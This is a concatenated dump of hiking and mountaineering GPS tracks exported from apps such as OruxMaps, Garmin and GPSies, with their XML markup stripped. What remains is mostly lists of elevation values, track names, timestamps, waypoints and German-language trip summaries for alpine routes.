+1607.46 + + +1621.4 + + +1641.59 + + +1647.36 + + +1669.95 + + +1689.17 + + +1715.13 + + +1720.9 + + +1730.99 + + +1735.32 + + +1734.84 + + +1741.08 +" +" + + + + + + + +Track 12.09.2014 - Allgäulilücke + + + +1495.47 + + +1501.24 + + +1575.74 + + +1621.4 + + +1606.98 + + +1631.49 + + +1657.93 + + +1670.43 + + +1673.31 + + +1687.73 + + +1701.19 + + +1709.84 + + +1719.46 + + +1733.39 + + +1745.89 + + +1767.04 + + +1804.53 + + +1814.63 + + +1855.0 + + +1863.65 + + +1880.0 + + +1894.9 + + +1900.18 + + +1908.35 + + +1911.72 + + +1920.37 + + +1913.16 + + +1902.59 + + +1889.61 + + +1870.86 + + +1863.65 + + +1855.48 + + +1828.56 + + +1818.47 + + +1805.01 + + +1766.56 + + +1742.53 + + +1735.8 + + +1726.67 + + +1717.53 + + +1707.44 + + +1700.23 + + +1693.5 + + +1669.47 + + +1661.3 + + +1652.64 + + +1628.13 + + +1616.59 + + +1573.82 + + +1535.84 + + +1498.35 + + +1492.58 +" +" + + +Habart + + + + + +OruxMaps + + + +Habart +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: Habart</h2><br /><p>Startzeit: 07/03/2015 09:09</p><p>Zielzeit: 07/03/2015 11:38</p><p>Strecke: 3,5km (02:29)</p><p>Bewegungszeit: 01:18</p><p>Ø-Geschwindigkeit: 1,4km/h</p><p>Netto-Geschwindigkeit: 2,7km/h</p><p>Max. Geschwindigkeit: 6,5km/h</p><p>Minimale Höhe: 1618m</p><p>Maximale Höhe: 2301m</p><p>Steig-Geschw.: 417,3m/h</p><p>Sink-Geschw.: -540,4m/h</p><p>Aufstieg: 714m</p><p>Abstieg: -293m</p><p>Steigzeit: 01:42</p><p>Sinkzeit: 00:32</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +1618.0 + + + +1618.9 + + + +1636.99 + + + +1639.0 + + + +1653.87 + + + +1665.99 + + + +1673.24 + + + +1687.25 + + + +1704.75 + + + +1708.85 + + + +1741.38 + + + +1770.39 + + + +1793.99 + + + +1804.97 + + + +1819.83 + + + +1831.37 + + + +1847.8 + + + +1852.89 + + + +1891.58 + + + +1932.9 + + + +1960.24 + + + +1970.27 + + + +1986.99 + + + +1998.43 + + + +2011.75 + + + +2040.31 + + + +2068.46 + + + +2088.46 + + + +2139.44 + + + +2162.8 + + + +2161.47 + + + +2165.6 + + + +2205.86 + + + +2277.5 + + + +2289.25 + + + +2301.34 + + + +2285.49 + + + +2252.37 + + + +2245.49 + + + +2206.9 + + + +2167.87 + + + +2182.03 + + + +2149.6 + + + +2096.87 + + + +2070.04 + + + +2039.9 + + + +2016.13 + +" +" + + + + + + +Garmin International + + +2015-06-26 19:32:35 + + + + + + +1554.85 + + + +1567.99 + + + +1588.43 + + + +1606.56 + + + +1638.18 + + + +1656.6 + + + +1675.01 + + + +1716.25 + + + +1740.64 + + + +1776.18 + + + +1803.65 + + + +1858.58 + + + +1820.76 + + + +1809.8 + + + +1790.17 + + + +1753.58 + + + +1737.96 + + + +1750.02 + + + +1694.74 + + + +1688.05 + + + +1710.9 + + + +1753.56 + + + +1788.81 + + + +1792.09 + + + +1809.55 + + + +1782.96 + + + +1756.93 + + + +1705.65 + + + +1673.04 + + + +1633.79 + + + +1618.6 + + + +1598.47 + + + +1561.52 + + + +1545.96 + + + +1548.05 + + + +1548.54 + + + +1550.35 + + + +1539.78 + + + +1501.15 + + + +1484.71 + + + +1474.5 + + + +1461.02 + + + +1441.75 + + + +1424.05 + + + +1404.72 + + + +1355.26 + + + +1332.77 + + + +1309.39 + + + +1295.8 + + + +1280.64 + + + +1227.09 + + + +1215.43 + + + +1206.31 + + + +1195.76 + + + +1173.85 + + + +1169.01 + + + +1169.98 + +" +" + + +GPSies Track + + + + +GPSies Track on GPSies.com + + +GPSies Track on GPSies.com + + + +982.0 + + + +1014.0 + + + +1071.0 + + + +1088.0 + + + +1117.0 + + + +1167.0 + + + +1165.0 + + + +1149.0 + + + +1215.0 + + + +1274.0 + + + +1282.0 + + + +1310.0 + + + +1351.0 + + + +1373.0 + + + +1429.0 + + + +1462.0 + + + +1494.0 + + + +1560.0 + + + +1647.0 + + + +1665.0 + + + +1725.0 + + + +1752.0 + + + +1811.0 + + + +1809.0 + + + +1843.0 + + + +1883.0 + + + +1888.0 + + + +1955.0 + + + +1903.0 + + + +1886.0 + + + +1869.0 + + + +1813.0 + + + +1792.0 + + + +1763.0 + + + +1739.0 + + + +1717.0 + + + +1617.0 + + + +1601.0 + + + +1550.0 + + + +1534.0 + + + +1530.0 + + + +1413.0 + + + +1393.0 + + + +1363.0 + + + +1308.0 + + + +1277.0 + + + +1248.0 + + + +1243.0 + + + +1225.0 + + + +1115.0 + + + +1129.0 + + + +1107.0 + + + +1078.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +KOMPASS Digital Map Track + + + + + + + +Leobner Mauer + + + + + + +1226.67 + + + +1223.12 + + + +1224.83 + + + +1228.15 + + + +1254.79 + + + +1267.78 + + + +1289.71 + + + +1288.23 + + + +1319.06 + + + +1337.72 + + + +1360.7 + + + +1345.0 + + + +1350.05 + + + +1360.48 + + + +1389.79 + + + +1392.16 + + + +1441.04 + + + +1477.04 + + + +1517.13 + + + +1608.63 + + + +1618.62 + + + +1619.39 + + + +1672.23 + + + +1661.02 + + + +1667.7 + + + +1700.46 + + + +1701.06 + + + +1757.65 + + + +1779.88 + + + +1775.81 + + + +1760.42 + + + +1804.05 + + + +1820.85 + + + +1838.74 + + + +1839.43 + + + +1860.0 + + + +1854.34 + + + +1839.43 + + + +1838.54 + + + +1822.63 + + + +1815.49 + + + +1769.57 + + + +1773.62 + + + +1780.49 + + + +1758.13 + + + +1713.56 + + + +1696.25 + + + +1667.31 + + + +1660.89 + + + +1665.3 + + + +1659.24 + + + +1663.79 + + + +1648.24 + + + +1623.39 + + + +1592.97 + + + +1592.45 + + + +1579.92 + + + +1572.35 + + + +1581.5 + + + +1589.17 + + + +1580.07 + + + +1572.1 + + + +1539.59 + + + +1533.37 + + + +1515.59 + + + +1487.09 + + + +1479.05 + + + +1460.89 + + + +1412.52 + + + +1397.39 + + + +1374.47 + + + +1323.56 + + + +1316.16 + + + +1278.36 + + + +1249.72 + + + +1231.28 + + + +1227.86 + + + +1224.81 + + + +1224.73 + +" +" + + + + +<p>Orario inizio: 03/08/2018 09:07< + + +1276.900024 + + +1292.880005 + + +1298.439941 + + +1308.130005 + + +1316.5 + + +1404.170044 + + +1401.089966 + + +1387.030029 + + +1384.680054 + + +1371.480103 + + +1344.619995 + + +1332.080078 + + +1307.97998 + + +1279.790039 + + +1255.450073 + + +1254.439941 + + +1256.380005 + + +1267.469971 + + +1259.73999 + + +1278.02002 + + +1281.579956 + + +1296.079956 + + +1298.570068 + + +1271.72998 + + +1239.570068 + + +1244.089966 + + +1238.040039 + + +1232.619995 + + +1241.950073 + + +1246.670044 + + +1245.680054 + + +1239.719971 + + +1232.069946 + + +1228.73999 + + +1231.589966 + + +1222.109985 + + +1216.109985 + + +1225.76001 + + +1228.25 + + +1234.820068 + + +1242.700073 + + +1241.950073 + + +1245.409912 + + +1246.280029 + + +1244.869995 + + +1243.719971 + + +1246.200073 + + +1256.040039 + + +1245.5 + + +1256.099976 + + +1266.709961 + + +1287.359985 +" +" + + +napf 2018-02-18 + + + + + + +napf 2018-02-18 + + + +924.0 + + +929.9999828427503 + + +934.2000103560853 + + +945.7999687244477 + + +955.0999730169067 + + +965.4000592276591 + + +995.6000328845143 + + +1007.0854213870643 + + +1019.5712783158515 + + +1041.4 + + +1042.4 + + +1059.088820825202 + + +1064.9999750419286 + + +1090.500052730699 + + +1104.7999793008066 + + +1138.800077577396 + + +1144.0999559769982 + + +1163.8000083329696 + + +1179.299840340542 + + +1193.6 + + +1215.499902523376 + + +1222.7000504453315 + + +1223.479271767998 + + +1227.999862417147 + + +1233.099910249087 + + +1238.9 + + +1244.5999446502583 + + +1249.1 + + +1255.5999921683238 + + +1261.6044970634428 + + +1265.5000480499186 + + +1269.699954422353 + + +1274.0951842991358 + + +1276.9 + + +1289.0 + + +1294.4 + + +1300.8 + + +1307.6000355715582 + + +1313.5999297987867 + + +1328.0 + + +1336.900046926245 + + +1343.300034561455 + + +1350.2 + + +1359.2000218866633 + + +1374.9000318044395 + + +1384.8999893467226 + + +1389.599780446481 + + +1394.1999112485576 + + +1403.2 + + +1399.6000026021495 + + +1398.700008605142 + + +1394.1999112485757 + + +1389.5997804464537 + + +1386.2 + + +1374.900031804466 + + +1360.3000189506479 + + +1350.2 + + +1343.3000313781818 + + +1334.8000863443701 + + +1325.100125715011 + + +1310.432893798041 + + +1269.200133799916 + + +1260.7 + + +1253.8000366631375 + + +1215.9999320244526 + + +1209.5000625154348 + + +1202.2 + + +1174.8000339241698 + + +1154.2000078332296 + + +1143.1999987113716 + + +1120.4999798083584 + + +1093.5998965895826 + + +1081.6467028155917 + + +1073.3999365217678 + + +1022.4999343355462 + + +1007.7 + + +1000.5999641596956 + + +973.1 + + +945.8999681842329 + + +941.2 + + +931.2000213152802 + + +923.4 +" +" + + +pic foreant + + + + + +OruxMaps + + + +pic foreant +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: pic foreant</h2><br /><p>Startzeit: 09/23/2015 12:01</p><p>Zielzeit: 09/23/2015 14:17</p><p>Strecke: 4,4km (02:16)</p><p>Bewegungszeit: 01:32</p><p>Ø-Geschwindigkeit: 1,9km/h</p><p>Netto-Geschwindigkeit: 2,9km/h</p><p>Max. Geschwindigkeit: 6,3km/h</p><p>Minimale Höhe: 2574m</p><p>Maximale Höhe: 3028m</p><p>Steig-Geschw.: 374m/h</p><p>Sink-Geschw.: -443,1m/h</p><p>Aufstieg: 456m</p><p>Abstieg: -457m</p><p>Steigzeit: 01:13</p><p>Sinkzeit: 01:01</p><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/> + +Unbestimmt + + + + + +2579.77 + + + +2582.39 + + + +2583.13 + + + +2588.73 + + + +2603.42 + + + +2626.79 + + + +2638.53 + + + +2636.88 + + + +2665.76 + + + +2680.66 + + + +2678.66 + + + +2670.17 + + + +2704.47 + + + +2731.14 + + + +2739.11 + + + +2757.64 + + + +2790.34 + + + +2795.75 + + + +2809.26 + + + +2860.18 + + + +2893.26 + + + +2907.14 + + + +2932.24 + + + +2966.54 + + + +2965.7 + + + +2962.77 + + + +2973.76 + + + +2996.64 + + + +3028.64 + + + +3023.51 + + + +3016.67 + + + +3010.64 + + + +3001.77 + + + +2982.65 + + + +2972.51 + + + +2962.7 + + + +2938.14 + + + +2920.64 + + + +2917.16 + + + +2869.64 + + + +2849.65 + + + +2816.67 + + + +2809.77 + + + +2799.65 + + + +2775.89 + + + +2758.64 + + + +2744.64 + + + +2718.51 + + + +2688.77 + + + +2676.2 + + + +2653.63 + + + +2650.66 + + + +2643.74 + + + +2631.64 + + + +2622.67 + + + +2594.74 + + + +2582.17 + + + +2578.76 + + + +2575.67 + +" +" + + +Il Colle - Cima di Morissolo 25/apr/2016 11:14:29 + + +1196.0 + + +1248.0 + + +1259.0 + + +1242.0 + + +1245.0 + + +1264.0 + + +1260.0 + + +1274.0 + + +1259.0 + + +1261.0 + + +1262.0 + + +1273.0 + + +1267.0 + + +1254.0 + + +1250.0 + + +1258.0 + + +1288.0 + + +1287.0 + + +1280.0 + + +1307.0 + + +1321.0 +" +" + + + + + + +Garmin International + + + +Haltestelle Bus bis Haltestelle Bus 1 + + + + + +2030.609375 + +Haltestelle Bus +Haltestelle Bus +Haltestelle Bus + +Waypoint + + + + +2032.109375 + +Silvretta Straße +Silvretta Straße +Silvretta Straße + +Waypoint + + + + +2028.0859375 + +Pfad +Pfad +Pfad + +Waypoint + + + + +2114.4921875 + +Pfad1 +Pfad +Pfad + +Waypoint + + + + +2649.48046875 + +Radsattel (2652m) +Radsattel (2652m) +Radsattel (2652m) + +Waypoint + + + + +2446.41796875 + +Hütte +Hütte +Hütte + +Waypoint + + + + +2073.2109375 + +Brücke Klostertaler Bach +Brücke Klostertaler Bach +Brücke Klostertaler Bach + +Waypoint + + + + +2030.609375 + +Haltestelle Bus +Haltestelle Bus +Haltestelle Bus + +Waypoint + + + " +" + + + + + + + + + + + + +407.0 + + + + + +0.000000 + +408.0 + + + + + +37.662460 + +407.0 + + + + + +34.278702 + +407.0 + + + + + +17.885040 + +415.0 + + + + + +3.392731 + +433.0 + + + + + +6.717377 + +441.0 + + + + + +27.450348 + +444.0 + + + + + +18.720703 + +440.0 + + + + + +36.803650 + +448.0 + + + + + +3.169128 + +447.0 + + + + + +0.000000" +" + + + + + + +Garmin International + + +MAMBRETTI3 12:57:20 + + + + + + +1220.05 + + + +1226.3 + + + +1230.62 + + + +1240.24 + + + +1238.8 + + + +1248.41 + + + +1249.37 + + + +1250.33 + + + +1260.43 + + + +1265.71 + + + +1276.29 + + + +1276.29 + + + +1292.15 + + + +1299.36 + + + +1304.17 + + + +1304.17 + + + +1358.96 + + + +1369.54 + + + +1370.98 + + + +1414.72 + + + +1413.76 + + + +1412.79 + + + +1412.79 + + + +1429.62 + + + +1404.14 + + + +1398.37 + + + +1425.77 + + + +1428.66 + + + +1443.08 + + + +1460.38 + + + +1475.28 + + + +1482.01 + + + +1491.62 + + + +1493.06 + + + +1498.35 + + + +1983.82 + + + +2024.19 + + + +2037.65 + + + +2039.57 + + + +2039.09 + + + +1802.61 + + + +1702.15 + + + +1622.84 + + + +1577.18 + + + +1555.07 + + + +1556.99 + + + +1597.37 + + + +1602.66 + + + +1609.38 + + + +1603.14 + + + +1611.79 + + + +1621.88 + + + +1622.36 + + + +1622.84 + + + +1621.88 + + + +1643.03 + + + +1644.95 + + + +1703.11 + + + +1737.72 + + + +1768.96 + + + +1800.21 + + + +1826.64 + + + +1844.43 + + + +1879.51 + + + +1933.35 + + + +1955.94 + + + +1966.99 + + + +1975.65 + + + +2005.45 + + + +2004.01 + + + +2004.97 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +2015-04-23 15:30:50 + + + + + + +863.34 + + + +865.4 + + + +868.66 + + + +873.78 + + + +874.88 + + + +879.99 + + + +904.27 + + + +923.77 + + + +946.38 + + + +959.53 + + + +956.24 + + + +951.72 + + + +954.73 + + + +946.7 + + + +956.28 + + + +959.78 + + + +946.69 + + + +951.18 + + + +940.0 + + + +939.3 + + + +939.93 + + + +942.22 + + + +946.54 + + + +934.57 + + + +929.15 + + + +919.72 + + + +930.14 + + + +930.05 + + + +929.83 + + + +934.28 + + + +948.42 + + + +968.51 + + + +977.7 + + + +981.86 + + + +983.0 + + + +984.76 + + + +975.96 + + + +974.9 + + + +978.3 + + + +978.7 + + + +977.46 + + + +978.37 + + + +958.49 + + + +918.06 + + + +917.39 + + + +913.81 + + + +898.7 + + + +892.15 + + + +895.89 + + + +890.12 + + + +880.18 + + + +884.93 + + + +875.59 + + + +873.21 + + + +871.56 + + + +870.6 + + + +870.65 + +" +" + + + + + + +Garmin International + + +2014-06-02 16:04:30 + + + + + + +1491.9 + + + +1483.05 + + + +1479.46 + + + +1481.9 + + + +1491.45 + + + +1465.08 + + + +1465.54 + + + +1457.96 + + + +1442.53 + + + +1416.02 + + + +1410.33 + + + +1391.49 + + + +1373.85 + + + +1374.42 + +" +" + + + + + + +Garmin International + + +2015-05-27 20:25:58 + + + + + + +1072.93 + + + +1069.89 + + + +1079.13 + + + +1167.93 + + + +1194.28 + + + +1292.88 + + + +1351.94 + + + +1395.81 + + + +1399.51 + + + +1381.38 + + + +1372.23 + + + +1336.49 + + + +1270.22 + + + +1181.1 + + + +1163.32 + + + +1148.09 + + + +1142.35 + + + +1100.52 + + + +1081.72 + + + +1074.73 + +" +" + + + + + + +Garmin International + + + +SpotMe 17.06.16 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + + +Under dem Birg-Engstligenalp + + + +1400.125 + + +1401.94140625 + + +1407.578125 + + +1412.4453125 + + +1409.89453125 + + +1440.33984375 + + +1448.75390625 + + +1455.58984375 + + +1477.1328125 + + +1514.11328125 + + +1510.1953125 + + +1547.7578125 + + +1603.55859375 + + +1582.72265625 + + +1594.51953125 + + +1597.3671875 + + +1633.28515625 + + +1641.32421875 + + +1669.390625 + + +1651.16015625 + + +1674.1015625 + + +1662.36328125 + + +1677.0859375 + + +1693.47265625 + + +1741.66796875 + + +1738.6953125 + + +1774.73828125 + + +1801.8125 + + +1785.5703125 + + +1798.81640625 + + +1821.140625 + + +1820.95703125 + + +1834.1640625 + + +1842.3984375 + + +1859.65234375 + + +1928.85546875 + + +1914.1796875 + + +1930.44140625 + + +1940.0625 + + +1927.87890625 + + +1931.8125 +" +" + + + + + + + +Traccia 17/9/2017 (20170917142825012) + + + +567.0 + + + +589.0 + + + +588.0 + + + +618.0 + + + +644.0 + + + +639.0 + + + +635.0 + + + +643.0 + + + +659.0 + + + +653.0 + + + +652.0 + + + +654.0 + + + +657.0 + + + +662.0 + + + +667.0 + + + +666.0 + + + +658.0 + + + +658.0 + + + +629.0 + + + +627.0 + + + +608.0 + + + +593.0 + + + +583.0 + + + +583.0 + + + +584.0 + + + +580.0 + + + +581.0 + + + +576.0 + + + +561.0 + + + +566.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + + +141107 Hochsalwand Spot + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + + + + +Garmin International + + +A5-OKT-16 14:12:01 + + + + + +391.87 + + + +369.28 + + + +398.6 + + + +418.31 + + + +437.06 + + + +438.02 + + + +419.27 + + + +422.16 + + + +427.92 + + + +428.4 + + + +423.12 + + + +388.51 + + + +423.6 + + + +429.37 + + + +431.29 + + + +437.54 + + + +440.42 + + + +451.0 + + + +451.96 + + + +445.71 + + + +421.68 + + + +395.24 + + + +387.07 + + + +386.11 + +" +" + + + + + + +Garmin International + + + +2016-09-04-01 + + + + + + +1497.8 + + + +1498.7 + + + +1514.8 + + + +1512.9 + + + +1510.1 + + + +1527.6 + + + +1540.9 + + + +1551.5 + + + +1566.1 + + + +1576.2 + + + +1584.2 + + + +1578.9 + + + +1581.6 + + + +1579.6 + + + +1574.2 + + + +1577.7 + + + +1575.1 + + + +1570.6 + + + +1574.4 + + + +1584.9 + + + +1614.5 + + + +1619.8 + + + +1616.9 + + + +1621.8 + + + +1613.2 + + + +1618.1 + + + +1620.4 + + + +1618.5 + + + +1622.5 + + + +1611.9 + + + +1604.5 + + + +1602.7 + + + +1608.7 + + + +1598.4 + + + +1622.0 + + + +1627.4 + + + +1605.9 + + + +1603.4 + + + +1603.2 + + + +1611.3 + + + +1615.4 + + + +1615.0 + + + +1617.0 + + + +1628.2 + + + +1626.0 + + + +1626.0 + + + +1622.1 + + + +1621.7 + + + +1620.8 + + + +1621.7 + + + +1598.0 + + + +1580.8 + + + +1574.0 + + + +1564.1 + + + +1578.4 + + + +1595.1 + + + +1577.4 + + + +1571.6 + + + +1576.2 + + + +1569.6 + + + +1579.5 + + + +1586.9 + + + +1582.4 + + + +1581.2 + + + +1578.7 + + + +1564.5 + + + +1557.3 + + + +1536.7 + + + +1533.1 + + + +1526.0 + + + +1523.4 + + + +1509.1 + +" +" + + + + + + + +AUGSTBORDHORN + + + +2047.0 + + +2054.2 + + +2067.8 + + +2076.9 + + +2086.8 + + +2104.8 + + +2116.0 + + +2124.6 + + +2142.5 + + +2170.4 + + +2189.2 + + +2197.0 + + +2199.4 + + +2207.3 + + +2225.3 + + +2233.0 + + +2240.4 + + +2247.4 + + +2258.5 + + +2261.2 + + +2268.0 + + +2285.3 + + +2302.1 + + +2303.3 + + +2309.5 + + +2316.5 + + +2347.2 + + +2370.5 + + +2411.7 + + +2428.2 + + +2449.4 + + +2460.9 + + +2486.1 + + +2498.1 + + +2511.9 + + +2513.7 + + +2519.1 + + +2526.2 + + +2543.6 + + +2569.9 + + +2592.9 + + +2606.0 + + +2634.0 + + +2652.8 + + +2679.4 + + +2695.5 + + +2699.9 + + +2723.5 + + +2756.8 + + +2761.9 + + +2775.3 + + +2789.4 + + +2803.0 + + +2804.9 + + +2799.4 + + +2809.1 + + +2821.4 + + +2827.5 + + +2828.1 + + +2819.1 + + +2808.8 + + +2835.1 + + +2882.3 + + +2897.3 + + +2905.4 + + +2953.1 + + +2951.8 +" +" + + + + + + +Garmin International + + +2015-08-27 14:26:51 + + + + + + +1275.6 + + + +1278.25 + + + +1279.11 + + + +1288.86 + + + +1299.32 + + + +1300.93 + + + +1309.36 + + + +1319.83 + + + +1331.2 + + + +1337.13 + + + +1348.95 + + + +1367.82 + + + +1371.63 + + + +1382.52 + + + +1394.86 + + + +1415.71 + + + +1425.0 + + + +1429.28 + + + +1435.14 + + + +1441.83 + + + +1445.25 + + + +1458.05 + + + +1482.25 + + + +1530.21 + + + +1551.74 + + + +1569.79 + + + +1586.32 + + + +1621.87 + + + +1711.09 + + + +1704.23 + + + +1705.78 + + + +1698.63 + + + +1687.58 + + + +1703.16 + + + +1708.35 + + + +1718.92 + + + +1720.71 + + + +1733.73 + + + +1752.87 + + + +1759.69 + + + +1758.6 + + + +1724.28 + + + +1710.19 + + + +1685.41 + + + +1664.13 + + + +1644.48 + + + +1616.16 + + + +1602.72 + + + +1591.83 + + + +1577.4 + + + +1525.95 + + + +1453.61 + + + +1436.66 + + + +1429.57 + + + +1408.83 + + + +1395.69 + + + +1383.59 + + + +1372.65 + + + +1352.8 + + + +1333.84 + + + +1325.9 + + + +1307.44 + + + +1299.33 + + + +1297.28 + +" +" + + + +Federal Office of Topography Switzerland + + + + +Brüggler + + + +1241.0 + + + +1245.0 + + + +1255.0 + + + +1261.0 + + + +1275.0 + + + +1286.0 + + + +1301.0 + + + +1315.0 + + + +1334.0 + + + +1365.0 + + + +1423.0 + + + +1468.0 + + + +1476.0 + + + +1488.0 + + + +1490.0 + + + +1514.0 + + + +1542.0 + + + +1572.0 + + + +1614.0 + + + +1652.0 + + + +1673.0 + + + +1696.0 + + + +1699.0 + + + +1720.0 + + + +1733.0 + + + +1745.0 + + + +1730.0 + + + +1703.0 + + + +1656.0 + + + +1625.0 + + + +1629.0 + + + +1590.0 + + + +1591.0 + + + +1604.0 + + + +1573.0 + + + +1614.0 + + + +1739.0 + + + +1755.0 + + + +1703.0 + + + +1688.0 + + + +1650.0 + + + +1586.0 + + + +1584.0 + + + +1568.0 + + + +1549.0 + + + +1490.0 + + + +1473.0 + + + +1453.0 + + + +1450.0 + + + +1430.0 + + + +1398.0 + + + +1370.0 + + + +1359.0 + + + +1343.0 + + + +1324.0 + + + +1317.0 + + + +1313.0 + + + +1306.0 + + + +1301.0 + + + +1295.0 + + + +1283.0 + + + +1278.0 + + + +1267.0 + + + +1255.0 + + + +1244.0 + + + +1237.0 + + + +1232.0 + + + +1217.0 + +" +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + + +Polar + + + + + + + + +1347.0 + + + +1334.0 + + + +1337.0 + + + +1342.0 + + + +1347.0 + + + +1354.0 + + + +1359.0 + + + +1366.0 + + + +1390.0 + + + +1408.0 + + + +1451.0 + + + +1481.0 + + + +1517.0 + + + +1539.0 + + + +1554.0 + + + +1577.0 + + + +1601.0 + + + +1626.0 + + + +1645.0 + + + +1654.0 + + + +1737.0 + + + +1761.0 + + + +1790.0 + + + +1806.0 + + + +1807.0 + + + +1827.0 + + + +1841.0 + + + +1885.0 + + + +1955.0 + + + +1964.0 + + + +2012.0 + + + +2065.0 + + + +2081.0 + + + +2114.0 + + + +2135.0 + + + +2153.0 + + + +2160.0 + + + +2177.0 + + + +2194.0 + + + +2217.0 + + + +2253.0 + + + +2285.0 + + + +2300.0 + + + +2323.0 + + + +2331.0 + + + +2331.0 + + + +2370.0 + + + +2406.0 + + + +2410.0 + + + +2416.0 + + + +2428.0 + + + +2411.0 + + + +2404.0 + + + +2452.0 + + + +2466.0 + +" +" + + + + + + +Garmin Connect + + +Prato (Leventina) Bergsteigen +Alpine Überquerung T6 ll + +mountaineering + + +2448.199951171875 + + + + + + +2480.0 + + + + + + +2496.60009765625 + + + + + + +2501.199951171875 + + + + + + +2507.199951171875 + + + + + + +2483.800048828125 + + + + + + +2444.800048828125 + + + + + + +2435.60009765625 + + + + + + +2425.0 + + + + + + +2408.60009765625 + + + + + + +2393.60009765625 + + + + + + +2399.39990234375 + + + + + + +2400.39990234375 + + + + + + +2417.39990234375 + + + + + + +2483.199951171875 + + + + + + +2475.199951171875 + + + + + + +2471.0 + + + + + + +2474.39990234375 + + + + + + +2474.0 + + + + + + +2433.800048828125 + + + + + + +2422.800048828125 + + + + + + +2398.39990234375 + + + + + + +2387.199951171875 + + + + + + +2374.39990234375 + + + + + + +2358.60009765625 + + + + + + +2345.0 + + + + + + +2316.39990234375 + + + + + + +2280.39990234375 + + + + + + +2270.60009765625 + + + + + + +2262.39990234375 + + + + + " +" + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +" +" + + +Modrava-Lusen + +dodovogel + +dodovogel on GPSies.com +GPSiesUserOnWeb + + +Modrava-Lusen on GPSies.com +trackOnWeb + + +one-way trip +475.0 +12002.813443682486 +982.0 +1262.0 +201.0 + +Modrava-Lusen on GPSies.com + +trackOnWeb + + +983.0 + + + +983.0 + + + +988.0 + + + +1009.0 + + + +1049.0 + + + +1073.0 + + + +1077.0 + + + +1081.0 + + + +1104.0 + + + +1106.0 + + + +1128.0 + + + +1142.0 + + + +1143.0 + + + +1140.0 + + + +1138.0 + + + +1132.0 + + + +1129.0 + + + +1111.0 + + + +1104.0 + + + +1096.0 + + + +1093.0 + + + +1121.0 + + + +1139.0 + + + +1157.0 + + + +1161.0 + + + +1167.0 + + + +1179.0 + + + +1192.0 + + + +1208.0 + + + +1201.0 + + + +1204.0 + + + +1208.0 + + + +1212.0 + + + +1222.0 + + + +1232.0 + + + +1234.0 + + + +1243.0 + + + +1254.0 + + + +1262.0 + + + +1253.0 + + + +1249.0 + + + +1239.0 + + + +1228.0 + + + +1211.0 + + + +1164.0 + + + +1152.0 + + + +1148.0 + + + +1146.0 + + + +1146.0 + + + +1142.0 + + + +1149.0 + + + +1142.0 + + + +1141.0 + + + +1146.0 + + + +1147.0 + + + +1153.0 + + + +1152.0 + + + +1153.0 + + + +1165.0 + + + +1169.0 + + + +1170.0 + + + +1174.0 + + + +1179.0 + + + +1190.0 + + + +1196.0 + + + +1198.0 + + + +1199.0 + + + +1207.0 + + + +1205.0 + + + +1204.0 + + + +1193.0 + + + +1186.0 + + + +1180.0 + + + +1181.0 + + + +1257.0 + +" +" + + +2016-09-23-13-04-51 + + + + +2016-09-23-13-04-51 on GPSies.com + + +2016-09-23-13-04-51 on GPSies.com + + + +485.0 + + + +508.0 + + + +532.0 + + + +558.0 + + + +562.0 + + + +569.0 + + + +632.0 + + + +669.0 + + + +796.0 + + + +821.0 + + + +842.0 + + + +860.0 + + + +881.0 + + + +902.0 + + + +955.0 + + + +1014.0 + + + +1031.0 + + + +1025.0 + + + +1022.0 + + + +1029.0 + + + +1052.0 + + + +1067.0 + + + +1075.0 + + + +1060.0 + + + +1047.0 + + + +1028.0 + + + +1014.0 + + + +1000.0 + + + +989.0 + + + +983.0 + + + +977.0 + + + +975.0 + + + +970.0 + + + +967.0 + + + +964.0 + + + +972.0 + + + +972.0 + + + +969.0 + + + +957.0 + + + +936.0 + + + +928.0 + + + +903.0 + + + +867.0 + + + +819.0 + + + +807.0 + + + +782.0 + + + +768.0 + + + +754.0 + + + +750.0 + + + +731.0 + + + +709.0 + + + +693.0 + + + +659.0 + + + +640.0 + + + +635.0 + + + +625.0 + + + +617.0 + + + +605.0 + + + +600.0 + + + +586.0 + + + +573.0 + + + +560.0 + + + +556.0 + + + +543.0 + + + +536.0 + + + +528.0 + + + +507.0 + + + +488.0 + + + +484.0 + +" +" + + + + + + +Garmin International + + +2015-05-31 14:15:26-Trail Run + + + + + +491.37 + + + +490.41 + + + +497.62 + + + +505.79 + + + +506.27 + + + +505.79 + + + +512.04 + + + +510.12 + + + +513.96 + + + +520.21 + + + +517.81 + + + +502.91 + + + +515.88 + + + +509.64 + + + +512.04 + + + +516.37 + + + +508.67 + + + +499.06 + + + +492.33 + +" +" + + +saukarkopf + + + + + +OruxMaps + + + +saukarkopf +<h1>OruxMaps</h1><br /><hr align=""center"" width=""480"" style=""height: 2px; width: 517px""/><h2>Name: saukarkopf</h2><br /><p>Startzeit: 10/28/2015 14:11</p><p>Zielzeit: 10/28/2015 15:47</p><p>Strecke: 4,3km (01:36)</p><p>Bewegungszeit: 01:03</p><p>Ø-Geschwindigkeit: 2,7km/h</p><p>Netto-Geschwindigkeit: 4,1km/h</p><p>Max. Geschwindigkeit: 30,2km/h</p><p>Minimale Höhe: 1229m</p><p>Maximale Höhe: 2047m</p><p>Steig-Geschw.: 